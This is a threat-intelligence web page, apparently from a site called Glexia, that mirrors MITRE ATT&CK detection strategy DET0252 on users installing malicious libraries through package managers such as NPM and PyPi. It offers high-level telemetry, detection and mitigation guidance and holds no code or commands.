DET0252: User-Initiated Malicious Library Installation via Package Manager (T1204.005)
This detection strategy concerns users installing malicious software libraries through package managers or public code repositories. The business issue is...
Analyst context for executives and security teams
This detection strategy concerns users installing malicious software libraries through package managers or public code repositories. The business issue is that normal developer or user behavior can become the execution path for adversary code, bypassing controls focused only on phishing attachments or traditional initial access. For leaders, this is a software supply-chain and endpoint execution risk: the key question is whether the organization can see, govern, and investigate package installation activity on Linux, macOS, and Windows systems.
Executive priority
Prioritize this where developers, administrators, build systems, or power users can install packages from sources such as NPM, PyPi, or public repositories like GitHub. Useful executive questions include: who is allowed to install libraries, which repositories are trusted, whether package activity is logged, and whether SOC and incident response teams can quickly determine what was installed, by whom, on which host, and when. This supports operational resilience, software supply-chain governance, audit evidence, and incident scoping.
Technical view
The related ATT&CK technique is T1204.005 Malicious Library under Execution, with Linux, macOS, and Windows listed as platforms. Because the detection strategy object does not include official detection logic, teams should validate visibility around user-initiated package manager activity and subsequent process execution. SOC and IR teams should be able to correlate package install events, command-line activity, user context, host identity, source repository or package name where available, and follow-on execution or persistence-related behavior.
Likely telemetry
- Endpoint process creation and command-line telemetry
- Package manager install/update logs where available
- User, host, and privilege context for installation activity
- Network or proxy evidence of access to package managers and public repositories
- File creation or modification evidence for installed libraries and related artifacts
Detection direction
- Validate that package installation activity is visible across Linux, macOS, and Windows endpoints in scope.
- Correlate package manager execution with user identity, source location, package name, and subsequent child processes or unusual execution behavior.
- Tune for the difference between expected developer/build activity and unusual user-initiated installs on non-developer systems or privileged hosts.
- Use relationship context to focus on execution outcomes rather than only the download event; the risk materializes when malicious library code runs.
- Document blind spots where endpoint command-line logging, package manager logs, proxy logs, or repository metadata are not collected.
Mitigation priorities
- Define which users and systems are permitted to install software libraries and from which sources.
- Prefer trusted or controlled package sources where practical, especially for development and build environments.
- Limit unnecessary local administrative privileges that enable uncontrolled package installation.
- Ensure endpoint and network logging can support investigation of package installation and follow-on execution.
- Include malicious library installation scenarios in incident response playbooks and software supply-chain governance reviews.
Analyst notes and limits
The supplied ATT&CK detection strategy has no official description or detection text, so this take is based on the object name, external reference, and its relationship to T1204.005 Malicious Library. The relationship supports an execution-focused view involving user installation of malicious libraries through package managers such as NPM and PyPi and public repositories such as GitHub.
No specific analytics, data components, mitigations, platforms on the detection strategy object itself, or procedure examples were supplied. Local validation is required to determine applicable package managers, normal installation patterns, logging coverage, and acceptable risk.
User-Initiated Malicious Library Installation via Package Manager (T1204.005)
No official description is available in the imported ATT&CK source object.
How security teams should use this page
Treat this object as behavior context, not an attribution claim. Validate the related groups, software, data sources, and mitigations against official ATT&CK relationships and your own telemetry before making control-coverage decisions.
Techniques used
This mirrors the MITRE pattern of making group, software, campaign, and technique relationships scannable. Relationship notes come from mirrored ATT&CK relationship text when available.
| Domain | ID | Name | Relationship / procedure |
|---|---|---|---|
| Enterprise | T1204.005 | Malicious Library Sub-technique | This object detects Malicious Library. |
All related ATT&CK context
Object version and sync metadata
The fields below describe the current mirrored snapshot. When Glexia retains multiple ATT&CK source imports, you can open the table to compare the same object across releases (hashes and MITRE timestamps). For MITRE’s own release notes and roadmap, see ATT&CK resources — Updates .
Imported snapshots across ATT&CK releases (1)
| Release | Bundle imported | Object version | Modified | Status | Raw hash |
|---|---|---|---|---|---|
| 19.1 | 1.0 | Current bundle | 8ae2f672a619… |
Mirrored ATT&CK source object
The raw object is retained through the mirrored ATT&CK source bundle and object hash. The raw endpoint returns the exact object from the mirrored bundle when available.
External references and citations
MITRE external references are preserved separately from Glexia analysis so citations remain traceable to their original source records.
-
[1]
mitre-attack DET0252Open source URL
Source: MITRE ATT&CK®. © 2026 The MITRE Corporation. This work is reproduced and distributed with the permission of The MITRE Corporation. MITRE ATT&CK and ATT&CK are registered trademarks of The MITRE Corporation. Glexia is not affiliated with or endorsed by MITRE.